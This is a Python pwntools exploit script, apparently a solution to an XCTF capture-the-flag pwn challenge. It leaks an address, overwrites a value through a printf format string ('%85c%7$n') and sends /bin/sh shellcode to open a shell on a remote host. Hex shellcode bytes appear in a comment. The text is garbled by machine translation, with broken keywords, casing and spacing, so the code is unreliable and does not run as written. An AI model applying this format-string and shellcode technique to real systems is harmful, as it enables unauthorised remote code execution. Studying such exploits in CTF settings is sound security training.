encoding = UTF. 8-#
#! usr / bin / Python
from PWN Import *
IO = Remote ( '111.198.29.45', 42643)
io.recvuntil ( "Secret [0] IS")
# recvuntil (some_string) until the received some_string
v3_0_addr = int (io.recvuntil ( "\ n") [: - 1], 16) # print cv3 [0] address
log.info ( "v3_0_addr:" + hex (v3_0_addr))
# enter sub_4000D72 ()
IO. recvuntil ( "BE Character's name:")
io.sendline ( "123")
# to enter sub_400A7D ()
io.recvuntil ( "East or up ?:")
io.sendline ( "East")
# to enter sub_400BB9 (): printf at format string vulnerability exists, use this to modify v3 [0] value is 85
io.recvuntil ( "there (. 1), or Leave (0) ?:")
io.sendline ( ". 1")
io.recvuntil ( " 'Give me an address'")
io.sendline(str(v3_0_addr))
io.recvuntil("you wish is:")
io.sendline("%85c%7$n")
# Use * <a_number_of_chars>% <number> $ n * can be written corresponding to the first * <number> Location * argument is the number of characters before% output
# as this question before by% 85c outputs 85 characters, then % 7 $ n with the parameters written in the seventh position of the 85
# into the sub_400CA6 (): v1 is forced to turn to a function pointer and implemented, we pass a system () function to getshell
context (OS = 'Linux ', arch =' amd64 ') # os setting parameter setting system for the target system linux, Arch set architecture AMD64
shellcode = ASM (shellcraft.sh ()) # (generated shellcode attack failed, the use disassembled shellcode )
# (the shellcode = "\ X6a \ X3B \ X58 \ x99 \ X52 \ X48 \ xbb \ X2F \ X2F \ X62 \ X69 \ x6e \ X2F \ X73 \ X68 \ X53 \ X54 \ X5F \ X52 \ X57 \ X54 \ x5e \ X0F \ X05 ")
# Note: master does not fail simply forgotten to context
# shellcraft is a class to help generate shellcode shellcraft.sh ():. obtain the execution system (" / bin / sh " ) corresponding to the machine code assembler code
io.recvuntil ( "the USE YOU SPELL")
io.sendline (the shellcode)
io.interactive ()
reference:
https://www.jianshu.com/p/457520f97a76
https://blog.csdn.net/qq_35495684/article/details/79583232
https://adworld.xctf.org.cn/task/writeup?type=pwn&id=5056&number=2&grade=0&page=1